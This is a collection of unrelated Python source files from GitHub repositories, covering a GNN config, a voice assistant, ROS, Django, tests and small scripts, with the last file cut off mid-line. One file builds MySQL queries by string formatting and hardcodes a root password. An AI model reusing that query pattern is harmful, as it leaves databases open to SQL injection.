+{"seq_id":"7498694265","text":"import sys\nfrom collections import namedtuple\nimport dgl\nimport torch\nimport torch.nn.functional as F\n\ndef getSettings(dataset_name,data=\"\"):\n\n config=dict()\n config['epoch'] = 100\n\n if (dataset_name == 'karate'):\n config['dataset_name'] = 'karate'\n config['labeled_only'] = True\n\n config['input_features'] = 34\n config['dropout'] = [0, 0]\n config['hidden_neurons'] = [10,10]\n config['out_features'] = 2\n config['batch_size'] = 5\n config['activation'] = F.relu\n config['learning_rate'] = 1e-2\n\n\n elif (dataset_name == 'CVE'):\n config['dataset_name'] = 'CVE'\n config['labeled_only'] = False\n config['input_features'] = 1000 #12432\n config['dropout'] = [0.5, 0.0, 0.0]\n config['hidden_neurons'] = [512,256]\n config['out_features'] = 11\n\n config['batch_size'] = 128\n config['epoch']=50\n config['activation']=F.relu\n config['learning_rate']=1e-3\n\n elif (dataset_name == 'imdb'):\n config['dataset_name'] = 'karate'\n config['labeled_only'] = True\n\n config['input_features'] = data.x.shape[1]\n config['dropout'] = [0, 0]\n config['hidden_neurons'] = [100,100]\n config['out_features'] = len(data.classname)\n config['batch_size'] = 32\n config['activation'] = F.relu\n config['learning_rate'] = 1e-2\n\n else:\n print('Dataset not found')\n sys.exit(0)\n\n return config\n\ndef get_dataset(config):\n if (config['dataset_name'] == 'CVE'):\n from Dataset.CVE_Dataset import data_G\n dataset = data_G(config['input_path'],config['labeled_only']) # true for labeled only dataset\n elif (config['dataset_name'] == 'karate'):\n from Dataset.Karate_Dataset import data_G_karate\n dataset = data_G_karate(config['input_path'])\n elif (config['dataset_name'] == 'imdb'):\n from Dataset.Imdb_read import data_G_imdb\n dataset = data_G_imdb(config)\n else:\n sys.exit(0)\n\n return dataset\n\ndef load_data(config):\n dataset=get_dataset(config)\n\n x=torch.tensor(dataset.Feature,dtype=torch.float)\n y=torch.tensor(dataset.Label,dtype=torch.long)\n G=dataset.Graph\n edges=G.edges()\n\n u = [src for src,dst in edges]\n v = [dst for src, dst in edges]\n\n try:\n if(config['directed']):\n tmp_u=list(u)\n u.extend(v)\n v.extend(tmp_u)\n except:\n print(\"Considering undirected graph\")\n\n train_index=torch.tensor(dataset.train_index,dtype=torch.long)\n test_index=torch.tensor(dataset.test_index,dtype=torch.long)\n val_index=torch.tensor(dataset.val_index,dtype=torch.long)\n\n edge_index=torch.tensor([u,v],dtype=torch.long)\n Dataset = namedtuple('Dataset', field_names=['x', 'y', 'edge_index', 'train_index', 'test_index', 'val_index','classname'])\n data=Dataset(x=x,y=y,edge_index=edge_index,train_index=train_index,test_index=test_index,val_index=val_index,classname=dataset.classname)\n\n return data\n\ndef load_data_DGL(config):\n dataset = get_dataset(config)\n\n x = torch.tensor(dataset.Feature, dtype=torch.float)\n y = torch.tensor(dataset.Label, dtype=torch.long)\n\n G = dgl.DGLGraph()\n G.from_networkx(dataset.Graph)\n\n\n train_index = torch.tensor(dataset.train_index, dtype=torch.long)\n test_index = torch.tensor(dataset.test_index, dtype=torch.long)\n val_index = torch.tensor(dataset.val_index, dtype=torch.long)\n\n Dataset = namedtuple('Dataset', field_names=['x', 'y', 'Graph', 'train_index', 'test_index', 'val_index','classname'])\n\n data = Dataset(x=x, y=y, Graph=G, train_index=train_index, test_index=test_index, val_index=val_index,classname=dataset.classname)\n\n return data\n\nif __name__ == '__main__':\n config=getSettings('karate')\n 
config['input_path']='/Users/siddharthashankardas/Purdue/Dataset/Karate/'\n data=load_data(config)\n\n print(data)","repo_name":"siddhartha047/GSSLEmbedding","sub_path":"GNN_configuration.py","file_name":"GNN_configuration.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"41577058668","text":"import csv\nfrom ff_graph_views import *\n\n\ndef main():\n data = {}\n\n with open(\"ff_reddit_contest_data.csv\", 'r') as f:\n reader = csv.reader(f)\n for line in reader:\n # Ignore header line\n if line[0] == \"Game\":\n continue\n\n key = line[0]\n data[key] = []\n\n for cell in line[1:]:\n if cell == '':\n break\n data[key].append(int(cell))\n\n plot_percentages(data)\n plot_votes(data)\n plot_votes(data, log=True)\n\n bar_percentage(data)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"johnsbuck/Final-Fantasy-Elminination-Rounds-Data-Analysis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25888034477","text":"\nfrom django.conf.urls import url\n\n\nfrom .views import (\n\n ItemCreateView,\n ItemListView,\n ItemDetailView,\n ItemUpdateView,\n)\nurlpatterns = [\n \n url(r'^create/$',ItemCreateView.as_view(), name='create' ),# restaurant_createview\n #url(r'^(?P\\d+)/edit/$', ItemUpdateView.as_view(),name='update'),\n url(r'^(?P\\d+)/$', ItemUpdateView.as_view(),name='detail'),\n url(r'^$', ItemListView.as_view(),name='list'),\n \n\n]\n","repo_name":"User9000/new-try_django11","sub_path":"menus/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4381449576","text":"#!/usr/bin/env python\n\nimport rospy\nfrom laser_assembler.srv import *\nfrom furniture_estimator.match import *\nimport tf\nimport yaml\nimport sys\nimport os\n\nclass Tracer:\n def __init__(self):\n self.model = rospy.get_param('~model')\n self.name = rospy.get_param('~name')\n\n self.br = tf.TransformBroadcaster()\n rospy.wait_for_service(\"assemble_scans\")\n self.assemble_scans = rospy.ServiceProxy('assemble_scans', AssembleScans)\n\n self.pose = rospy.get_param('~seed', [0,0,0])\n\n def estimate(self):\n resp = self.assemble_scans(rospy.Time(0,0), rospy.get_rostime())\n self.base_frame = resp.cloud.header.frame_id\n c2 = to_list(resp.cloud.points)\n\n cloud = filter_cloud(c2, self.pose)\n if cloud is None or len(cloud)==0:\n return None\n return find_best_transform(self.model, cloud, self.pose)\n \n def spin(self):\n r = rospy.Rate(20)\n while not rospy.is_shutdown():\n estimate = self.estimate()\n if estimate is not None:\n self.pose = estimate\n self.br.sendTransform((self.pose[0], self.pose[1], 0),\n tf.transformations.quaternion_from_euler(0, 0, self.pose[2]),\n rospy.Time.now(),\n self.name,\n self.base_frame)\n r.sleep()\n\nrospy.init_node('laser_tracer')\nfor arg in sys.argv[1:]:\n if 'yaml' in arg:\n model = yaml.load(open(arg))\n rospy.set_param('~model', model)\n name = os.path.splitext(os.path.split(arg)[-1])[0]\n rospy.set_param('~name', name)\n\nt = Tracer()\nt.spin()\n","repo_name":"DLu/furniture_estimator","sub_path":"src/interpret_laser.py","file_name":"interpret_laser.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"3993462811","text":"# https://atcoder.jp/contests/abc165/tasks/abc165_c\r\n# import sys\r\n# # def input(): return sys.stdin.readline().rstrip()\r\n# # input = sys.stdin.readline\r\n# input = sys.stdin.buffer.readline\r\n# sys.setrecursionlimit(10 ** 7)\r\n\r\nfrom itertools import combinations_with_replacement\r\n\r\ndef main():\r\n N, M, Q = map(int, input().split())\r\n a,b,c,d = [],[],[],[]\r\n for i in range(Q):\r\n _a,_b,_c,_d = map(int, input().split())\r\n a.append(_a-1)\r\n b.append(_b-1)\r\n c.append(_c)\r\n d.append(_d)\r\n ans = 0\r\n for A in combinations_with_replacement(range(M), N):\r\n # print(A)\r\n tmp = 0\r\n for i in range(Q):\r\n if A[b[i]] - A[a[i]] == c[i]:\r\n tmp += d[i]\r\n ans = max(ans, tmp)\r\n print(ans)\r\n return\r\nmain()\r\n\r\n# X = int(input())\r\n# S = input()\r\n# l = list(map(int, (input().split())))\r\n# A = [[int(i) for i in input().split()] for _ in range(N)]\r\n","repo_name":"Hironobu-Kawaguchi/atcoder","sub_path":"atcoder/abc165_c.py","file_name":"abc165_c.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"72871881181","text":"# System Module ======================\nfrom tkinter import *\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\nimport tkinter as tk\nimport sys\nfrom threading import Thread\nimport threading\nfrom time import sleep\nimport time\nimport speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport wikipedia\nimport pyjokes\nfrom PyDictionary import PyDictionary\n\n# Local modules ======================\nimport Functions\nimport SystemFunctions\nimport Calculator\n\n# Global Variables ===================\nAI_NAME = \"KRISTHEL\"\nEXIT_COMMANDS = ['shutdown', 'shut down', 'quit', 'exit', 'bye', 'good bye']\nai_text = \"\"\nbg = \"white\"\nbg1 = \"#0b4072\"\nbg2 = \"#EBF8FF\"\nstatus = True\n\n# AI VIRTUAL ASSISTANT VOICE ==================================================\ntry:\n engine = pyttsx3.init()\n r = sr.Recognizer()\n voices = engine.getProperty('voices')\n engine.setProperty('voice', voices[1].id) # male\nexcept Exception as e:\n print(e)\n\n# TEXT TO SPEECH ==============================================================\ndef speak(text):\n lbl_ai_stat['text'] = 'Speaking...'\n ai_text['text'] = text\n print(text)\n engine.say(text)\n engine.runAndWait()\n\n# SPEECH TO TEXT ==============================================================\ndef record():\n with sr.Microphone() as source:\n if status: r.adjust_for_ambient_noise(source, duration=1)\n if status: ai_text['image'] = ''\n if status: speak('Listening..')\n if status: lbl_ai_stat['text'] = 'Listening...'\n if status: ai_text['text'] = '...'\n if status: audio = r.listen(source)\n try:\n if status: print(\"Processing...\")\n if status: lbl_ai_stat['text'] = 'Processing...'\n if status: query = r.recognize_google(audio, language='en_US') # Google for voice recognition.\n if status: print('Your message:', format(query))\n except:\n return\n\n if status: return query\n else: return\n\n# ACTIVATING AI VIRTUAL ASSISTANT =============================================\ndef aiActive1():\n speak(Functions.greet())\n speak(f'My name is {AI_NAME}')\n speak('I am an AI virtual assistant always ready to help you.')\n aiActive()\n\ndef aiActive():\n speak('How may i help you?')\n global status\n while status:\n query = record()\n if query == None: continue\n if isContain(query, EXIT_COMMANDS):\n speak(\"Im going OFFLINE. 
Good Bye!\")\n lbl_ai_stat['text'] = 'Exiting...'\n ai_text['text'] = '...'\n close()\n break\n else:\n main(query.lower())\n\ndef micSwitch():\n global status\n if status:\n status = False\n print(f\"STATUS: {status} OFFLINE\")\n lbl_ai_stat['text'] = 'Sleeping Zzz...'\n ai_text['text'] = \"...\"\n else:\n status = True\n print(f\"STATUS: {status} ACTIVE\")\n Thread(target=aiActive).start()\n\n# COMMAND HANDLER =========================================================\ndef isContain(txt, lst):\n for word in lst:\n if word in txt:\n return True\n return False\n\ndef main(query):\n # AI VIRTUAL ASSISTANT NAME\n if isContain(query, ['what\\'s your name', 'what is your name', 'who are you', 'what are you']):\n speak('My name is, ' + AI_NAME)\n speak('I am an AI Virtual Assistant created to help you')\n return\n # GREETS BACK\n if isContain(query, ['morning', 'evening', 'noon']) and 'good' in query:\n speak(Functions.chat(\"good\"))\n return\n # CURRENT DATE / TIME\n if isContain(query, ['time', 'date']):\n speak(Functions.chat(query))\n return\n # PLAY YOUTUBE VIDEO\n if 'play' in query:\n speak('Opening youtube...')\n engine.runAndWait()\n pywhatkit.playonyt(query)\n micSwitch()\n return\n # SEARCH IN GOOGLE\n if 'google' in query:\n speak('Searching on Google...')\n engine.runAndWait()\n pywhatkit.search(query)\n micSwitch()\n return\n # DICTIONARY\n if isContain(query, ['definition', 'meaning', 'define']):\n dictionary = PyDictionary()\n query = query.replace('what is', '')\n query = query.replace('the', '')\n query = query.replace('definition', '')\n query = query.replace('meaning', '')\n query = query.replace('define', '')\n query = query.replace('of', '')\n result = dictionary.meaning(query)\n speak(result)\n return\n # TELLS A JOKE\n if 'joke' in query:\n speak(pyjokes.get_joke())\n engine.runAndWait()\n return\n # SEARCH IN WIKIPEDIA\n if 'wikipedia' in query: # if wikipedia found in the query then this block will be executed\n ai_text['text'] = 'Searching Wikipedia...'\n speak('Searching Wikipedia...')\n try:\n query = query.replace(\"wikipedia\", \"\")\n results = wikipedia.summary(query, sentences=3)\n speak(\"According to Wikipedia\")\n print(results)\n speak(results)\n except:\n speak(f\"Your query: {query} was Not Found\")\n speak(\"Please Repeat command\")\n return\n return\n # TRANSLATOR\n if \"translate\" in query:\n sentence = query.replace('translate', '')\n speak(\"Which language to translate ?\")\n language = record()\n result = Functions.lang_translate(sentence, language)\n\n if result == \"None\":\n speak(\"This language doesn't exists\")\n else:\n speak(f\"In {language.capitalize()} you would say:\")\n print(f\"In {language.capitalize()} you would say: \", result.text)\n speak(result.text)\n return\n # TOSS A COIN / ROLL A DIE\n if isContain(query, ['coin', 'dice', 'die']):\n if isContain(query, ['toss', 'roll', 'flip', 'throw']):\n result = Functions.generate(query)\n print(result)\n if \"Head\" in result:\n image = ImageTk.PhotoImage(Image.open('images/head.png').resize((200, 200), Image.ANTIALIAS))\n ai_text['image'] = image\n elif \"Tail\" in result:\n image = ImageTk.PhotoImage(Image.open('images/tail.png').resize((200, 200), Image.ANTIALIAS))\n ai_text['image'] = image\n else:\n image = ImageTk.PhotoImage(Image.open('images/' + result[-1] + '.png').resize((200, 200), Image.ANTIALIAS))\n ai_text['image'] = image\n speak(result)\n return\n # BASIC CALCULATOR\n if isContain(query, ['calculate', 'compute']):\n try:\n query = query.replace('calculate', '')\n query = 
query.replace('compute', '')\n query = query.replace('negative ', '-')\n\n speak(('Result is: ' + Calculator.calculate(query)))\n except Exception as e:\n return\n return\n # OPEN WEBSITE / SYSTEM PROGRAM\n if 'open' in query:\n bool = SystemFunctions.accessApp(query)\n if bool == False:\n speak(f\"Your query: {query} was Not Found\")\n micSwitch()\n return\n # TAKE SCREENSHOT\n if 'screenshot' in query:\n # Thread(target=SystemFunctions.winOpt(query), args=('screenshot', 'capture', 'snapshot')).start()\n SystemFunctions.winOpt(query)\n speak(\"Screenshot Taken\")\n micSwitch()\n return\n # CLOSE CURRENT SELECTED/ACTIVE WINDOW\n if isContain(query, ['window', 'close that']):\n SystemFunctions.winOpt(query)\n return\n # CLOSE CURRENT TAB\n if isContain(query, ['tab']):\n SystemFunctions.tabOpt(query)\n return\n # WRITE\n if isContain(query, ['type', 'save', 'delete', 'select', 'press enter']):\n SystemFunctions.systemOpt(query)\n return\n\n# GUI Functions ===========================================================================================\ndef progressbar():\n s = ttk.Style()\n s.theme_use('clam')\n s.configure(\"cyan.Horizontal.TProgressbar\", foreground='#2ee3ec', background='#2ee3ec')\n progress_bar = ttk.Progressbar(splash_root, style=\"cyan.Horizontal.TProgressbar\", orient=\"horizontal\",\n mode=\"determinate\", length=303)\n progress_bar.pack()\n splash_root.update()\n progress_bar['value'] = 0\n splash_root.update()\n\n while progress_bar['value'] < 100:\n progress_bar['value'] += 5\n splash_root.update()\n sleep(0.3)\n\ndef destroySplash():\n splash_root.destroy()\n\ndef close():\n time.sleep(1)\n root.destroy()\n sys.exit()\n\n# Driver Program ===============================================================================================================\nif __name__ == '__main__':\n # SPLASH Screen ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n splash_bg = \"#0b4072\"\n splash_root = Tk()\n splash_root.configure(bg=splash_bg)\n splash_root.overrideredirect(True)\n\n w_width, w_height = 500, 550\n s_width, s_height = splash_root.winfo_screenwidth(), splash_root.winfo_screenheight()\n x, y = (s_width / 2) - (w_width / 2), (s_height / 2) - (w_height / 2)\n splash_root.geometry('%dx%d+%d+%d' % (w_width, w_height, x, y - 30))\n\n obj_bot = ImageTk.PhotoImage(Image.open(\"images/bot.png\").resize((350, 350), Image.ANTIALIAS))\n img_ai = Label(splash_root, image=obj_bot, bg=splash_bg)\n img_ai.pack(pady=(20, 0))\n\n splash_label = Label(splash_root, text=AI_NAME, font=('calibri', 15, \"bold\"), bg=splash_bg, fg='white')\n splash_label.pack()\n splash_label1 = Label(splash_root, text=\"AI Virtual Assistant\", font=('calibri', 15, \"bold\"), bg=splash_bg, fg='white')\n splash_label1.pack(pady=(0,40))\n\n progressbar()\n splash_root.after(10, destroySplash)\n splash_root.mainloop()\n\n # MAIN Screen ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n root = Tk()\n root.title(AI_NAME)\n icon = PhotoImage(file='images/bot.png')\n root.iconphoto(True, icon)\n w_width, w_height = 500, 800\n s_width, s_height = root.winfo_screenwidth(), root.winfo_screenheight()\n x, y = (s_width / 2) - (w_width / 2), (s_height / 2) - (w_height / 2)\n root.geometry('%dx%d+%d+%d' % (w_width, w_height, x, y - 30)) # center location of the screen\n root.configure(bg=bg2)\n root.resizable(width=False, height=False)\n # FRAME 1: AI logo and status ------------------------------------------\n frame1 = Frame(root, bg=bg1)\n frame1.pack(fill=\"both\", expand=True)\n\n obj_bot = 
ImageTk.PhotoImage(Image.open(\"images/bot.png\").resize((300, 300), Image.ANTIALIAS))\n img_ai = Label(frame1, image=obj_bot, bg=bg1)\n img_ai.pack()\n\n lbl_ai_stat = Label(frame1, text='OFFLINE', font=('calibri', 16), fg='white', bg=bg1)\n lbl_ai_stat.pack(pady=(0, 20))\n\n # FRAME 2: AI Text output ------------------------------------------\n frame2 = Frame(root, bg=bg2)\n frame2.pack(fill=\"both\", expand=True)\n\n canvas = tk.Canvas(frame2, bg=bg2, height=360)\n scrollbar = ttk.Scrollbar(frame2, orient=\"vertical\", command=canvas.yview)\n scrollable_frame = ttk.Frame(canvas)\n scrollable_frame.bind(\n \"\",\n lambda e: canvas.configure(\n scrollregion=canvas.bbox(\"all\")\n ),\n )\n style = ttk.Style()\n style.configure(\"Vertical.TScrollbar\", background=\"green\", bordercolor=\"red\", arrowcolor=\"white\")\n canvas.create_window((0, 0), window=scrollable_frame)\n canvas.configure(yscrollcommand=scrollbar.set)\n\n ai_text = Label(scrollable_frame, text=\"\", font=('calibri', 12),\n wraplength=450, bg=bg2, justify=\"center\", anchor=\"center\")\n ai_text.pack(ipady=10, ipadx=15)\n\n canvas.pack(side=\"left\", fill=\"both\", expand=True)\n scrollbar.pack(side=\"right\", fill=\"y\")\n\n # FRAME 3: mic switch ----------------------------------------------\n frame3 = Frame(root, bg=bg2)\n frame3.pack(fill=\"both\", expand=True, side = BOTTOM)\n\n obj_mic = ImageTk.PhotoImage(Image.open(\"images/mic-1.png\").resize((55, 55), Image.ANTIALIAS))\n btn_mic = tk.Button(frame3, image=obj_mic, bg=bg2, activebackground=bg2,\n command=micSwitch)\n btn_mic[\"border\"] = \"0\"\n btn_mic.pack(pady=10)\n\n# Activate KRISTHEL AI Virtual Assistant =============================================================\n try:\n main_thread = threading.Thread(target=aiActive1)\n main_thread.start()\n except:\n pass\n\nroot.mainloop()","repo_name":"JzCatherine/KRISTHEL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"31994595480","text":"\"\"\"\nSlipt, Join, Enumerate em Pyhton\n* Split - Dividir uma string # str\n* Join - Juntar uma lista # str\n* Enumerate - Enumerar elementos da lista # str / iteraiveis\n\"\"\"\n\nfrase = \"Python é muito legal, estou gostando muito de aprender, é show de bola!\"\nlista = frase.split(' ') # aqui separa por espaco\nlista2 = frase.split(',') # aqui separa por virgula\nprint(lista, lista2)\n\n# contar palavras\nfor valor in lista:\n print(f'A palavra {valor} apareceu {lista.count(valor)}x na frase.')\n\n# qual palavra apareceu mais vezes na frase\npalavra = ''\ncontagem = 0\nfor valor in lista:\n qtd_vezes = lista.count(valor)\n\n if qtd_vezes > contagem:\n contagem = qtd_vezes\n palavra = valor\nprint(f'A palavra que apareceu mais vezes é: \"{palavra}\" e a contagem de vezes é: ({contagem}x)')\n\n# retirando espaço de uma frase e alterando o inicio da letra para maiuscula\nfor valor in lista2:\n print(valor.strip().capitalize())\n\n# Join\nfrase2 = 'Python é muito legal'\nlista3 = frase2.split(' ')\nfrase3 = ','.join(lista3)\nprint(frase3)\n\n# Enumerate\nfrase4 = 'Python é muito legal'\nlista4 = frase4.split(' ')\n\nfor indice, valor in enumerate(lista4):\n print(indice, valor)\n","repo_name":"iprih/curso-python","sub_path":"logica-de-programacao/slipt-join-enumerate.py","file_name":"slipt-join-enumerate.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"16474610943","text":"import mysql.connector\n# Open database connection\ndef getConnected():\n con = mysql.connector.Connect(host='localhost',\n database='mydb',user='root', password='root')\n return con\ndef addrec(id, name):\n con = getConnected()\n cursor = con.cursor()\n sql = \"INSERT INTO PERSON(ID, PNAME) VALUES ('%s', '%s')#\" % (id,name)\n try: # Execute the SQL command\n cursor.execute(sql)\n print (sql)\n con.commit() # Commit your changes in the database\n except Exception as e:\n con.rollback() # Rollback in case there is any error\n print (e)\n con.close() # disconnect from server\ndef viewRecord():\n con=getConnected()\n sql = \"SELECT * FROM PERSON\"\n cursor=con.cursor()\n text=\"\"\n try:\n # Execute the SQL command\n cursor.execute(sql)\n # Fetch all the rows in a list of lists.\n results = cursor.fetchall()\n for col in results:\n id = col[0]\n pname = col[1]\n \n # Now print fetched result\n text=text+\"\"+str(id)+\" \"+pname+\" \"\n except Exception as e:\n print (\"Error: unable to fecth data \",e)\n con.close()\n return \"\"\n","repo_name":"bhimsenrao/djangoproj","sub_path":"djProg2/myapp1/DBInsert.py","file_name":"DBInsert.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31316971026","text":"import tqdm\nfrom multiprocessing import Process, Pipe\n\n\ndef bootstrap(\n func, args, kwargs,\n num_runs,\n num_jobs = 1,\n):\n\n if num_jobs == 1:\n for iter_id in tqdm.tqdm(range(num_runs)):\n kwargs['seed'] = iter_id\n func(*args, **kwargs)\n\n elif num_jobs > 1:\n # initialize pipes\n pipe_list = [Pipe() for i in range(num_jobs)]\n\n # initialize processes\n proc_list = [\n Process(\n target = _mp_wrapper, \n args = (pipe_list[i][1], func, args, kwargs)\n ) for i in range(num_jobs)\n ]\n\n # start subprocesses\n for i in range(num_jobs):\n proc_list[i].start()\n\n # main loop\n for iter_id in tqdm.tqdm(range(num_runs)):\n # rotate\n i = 0\n while True:\n if pipe_list[i][0].poll():\n # receive ready signal\n _ = pipe_list[i][0].recv()\n\n # send iter_id to subprocess\n seed = iter_id\n pipe_list[i][0].send(seed)\n\n # next iter_id\n break\n\n else:\n i = (i + 1) % num_jobs\n\n # send termination signal to subprocesses\n for i in range(num_jobs):\n pipe_list[i][0].send(-1)\n\n # close pipes\n for i in range(num_jobs):\n pipe_list[i][0].close()\n\n # waiting for subprocesses to join/return\n for i in range(num_jobs):\n proc_list[i].join()\n\n else:\n pass\n\n\ndef _mp_wrapper(pipe, func, args, kwargs):\n\n while True:\n # send ready signal to main process\n pipe.send(1)\n\n # receive iter_id from main process\n seed = pipe.recv()\n\n if seed != -1:\n # seed can be any number as long as it's unique among all subprocesses\n kwargs['seed'] = seed\n\n # run\n func(*args, **kwargs)\n\n else:\n pipe.close()\n return\n","repo_name":"CRANK-MS/CRANK-MS","sub_path":"paper/bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"69"}
+{"seq_id":"16813311479","text":"import os\nfrom lxml import etree as ET\nimport json\nimport sys\n\n\ndef check(folder):\n    for root, dirs, files in os.walk(folder):\n        xml_files = [i for i in files if '.xml' in i]\n        for file in xml_files:\n            xml_parsed = ET.parse('{}/{}'.format(root, file)).getroot()\n            if xml_parsed.tag == 'error':\n                print('{}/{}'.format(root, file))\n\n        json_files = [i for i in files if '.json' in i]\n        for file in json_files:\n            with open('{}/{}'.format(root, file), 'r') as f:\n                parsed_json = json.loads(f.read())\n            if 'message' in parsed_json and parsed_json['message'] == \"Requested item not found\":\n                print('{}/{}'.format(root, file))\n\n\nif __name__ == '__main__':\n    try:\n        folder = sys.argv[1]\n    except IndexError:\n        print('\\nChange to: \"python looking_for_404_records.py $folder\"\\n\\n')\n        quit()\n    check(folder)\n","repo_name":"lsulibraries/cdm_xporter","sub_path":"one_off_scripts/cleaning_repository/looking_for_404_records.py","file_name":"looking_for_404_records.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30506452512","text":"import unittest\n\nfrom dart.model.event import Event\nfrom dart.model.event import EventData\nfrom dart.model.exception import DartValidationException\nfrom dart.schema.base import default_and_validate\nfrom dart.schema.event import event_schema\n\n\nclass TestEventSchema(unittest.TestCase):\n\n def test_event_schema(self):\n state = None\n e = Event(data=EventData('test-event', state=state))\n obj_before = e.to_dict()\n e = default_and_validate(e, event_schema())\n # state should be defaulted to INACTIVE\n self.assertNotEqual(obj_before, e.to_dict())\n\n def test_event_schema_invalid(self):\n with self.assertRaises(DartValidationException) as context:\n name = None\n e = Event(data=EventData(name))\n # should fail because the name is missing\n default_and_validate(e, event_schema())\n\n self.assertTrue(isinstance(context.exception, DartValidationException))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"RetailMeNotSandbox/dart","sub_path":"src/python/dart/test/schema/test_event.py","file_name":"test_event.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"69"}
+{"seq_id":"32041336972","text":"import pytest\n\nfrom salient.salient import find_duplicate_definitions, DuplicateFinder\n\ndata = \"\"\"\nfrom sqlalchemy import Boolean, Column, Integer\n\nclass RedefinedColumnsModel:\n __table_name__ = 'redefined_columns_model'\n duplicate = Column(Integer)\n col_1 = Column()\n col_2 = Column()\n duplicate = Column(Boolean)\n\nfalse_positive = True\nfalse_positive = False\n\"\"\"\n\n\n@pytest.mark.asyncio\nasync def test_find_duplicate_definitions():\n res = await find_duplicate_definitions(data)\n assert len(res) == 1\n assert \"duplicate\" in res\n assert res[\"duplicate\"][0] == (6, \"Column(Integer)\")\n assert res[\"duplicate\"][1] == (9, \"Column(Boolean)\")\n assert \"false_positive\" not in res\n\n\ndef test_duplicate_finder():\n nums = [1, 2, 3, 1, 2, 3, 4, 5, 6]\n df = DuplicateFinder()\n for i, n in enumerate(nums):\n df[n] = i\n assert 4 not in df.duplicates\n assert 5 not in df.duplicates\n assert 6 not in df.duplicates\n assert 1 in df.duplicates\n assert 2 in df.duplicates\n assert 3 in df.duplicates\n\n for n in nums:\n assert n in df.items\n","repo_name":"TomFaulkner/sa_lint","sub_path":"tests/test_redefined.py","file_name":"test_redefined.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32884737994","text":"# from sklearn.datasets import load_iris\r\n# iris = load_iris()\r\n# print(iris.feature_names)\r\n# print(iris.target_names)\r\n# print(iris.data[0])\r\n# print(iris.target[0])\r\n\r\nimport numpy as np\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn import tree\r\nimport pydotplus\r\n#viz code\r\nfrom sklearn.externals.six import StringIO\r\n\r\niris = load_iris()\r\ntest_idx = [0, 50, 100]\r\n\r\n#training data\r\ntraining_label = np.delete(iris.target, test_idx)\r\ntrain_data = np.delete(iris.data, test_idx, axis=0)\r\n\r\n#test data\r\ntest_label = iris.target[test_idx]\r\ntest_data = iris.data[test_idx]\r\n\r\nclf = tree.DecisionTreeClassifier()\r\nclf.fit(train_data, training_label)\r\nprint(test_label)\r\nprint(clf.predict(test_data))\r\n\r\n# import pydotplus\r\ndot_data = StringIO()\r\ntree.export_graphviz(clf, \r\n out_file=dot_data,\r\n feature_names=iris.feature_names,\r\n class_names=iris.target_names,\r\n filled=True, rounded=True,\r\n impurity=False)\r\ngraph = pydotplus.graph_from_dot_data(dot_data.getvalue())\r\ngraph.write_pdf(\"iris.pdf\")\r\nprint(iris.feature_names, iris.data[0], iris.target_names[iris.target[0]])\r\n","repo_name":"dolajide/ml","sub_path":"viz.py","file_name":"viz.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"44645700444","text":"def gg():\n print(\"****************************\")\n\n# directory setting \nimport os, re\nos.chdir(r'C:\\Users\\user\\Desktop\\파이썬\\Do-it-Python\\Do-it-python-practice\\03 텍스트 파일 가공하기')\nprint(os.getcwd())\ngg()\n\n# file load\nf = open('friends101.txt', 'r', encoding='utf8')\nscript101 = f.read()\nprint(script101[:100])\ngg()\n\n# only extract Monica's lines\nLine = re.findall(r'Monica:.+', script101)\nfor item in Line[:3]:\n print(item)\nf.close()\ngg()\n\n# save extracted lines \nf = open('monica.txt', 'w', encoding = 'utf8')\nmonica=''\nfor i in Line:\n monica += i+'\\n'\nf.write(monica)\nf.close()\n# extract character names\n# in the script every line starts with 'character :' format\nchar=re.compile(r'[A-Z][a-z]+:')\nprint(re.findall(char, script101))\ngg()\n\n# to remove duplicated names, use 'set' data type\nnames = set(re.findall(char, script101))\nprint(names)\ngg()\n\n# to remove \":\", change the 'set' to a 'list'\ncharacters = []\nfor i in list(names):\n characters += [i[:-1]]\nprint(characters)\ngg()\n\n# to make it simpler, one can also condense everything above into a single code\ncharacters = [x[:-1] for x in list(set(re.findall(r'[A-Z][a-z]+:', script101)))]\nprint(characters)\ngg()\n\n# What if I want to remove the 'directions' from the lines?\n# They start with '(' and ends with ')'\nf = open('monica_except_directions.txt', 'w', encoding = 'utf8')\nmonica_except_directions=''\n# test = 'Monica: (explaining to the others) Carol moved her stuff out today.'\n# test = 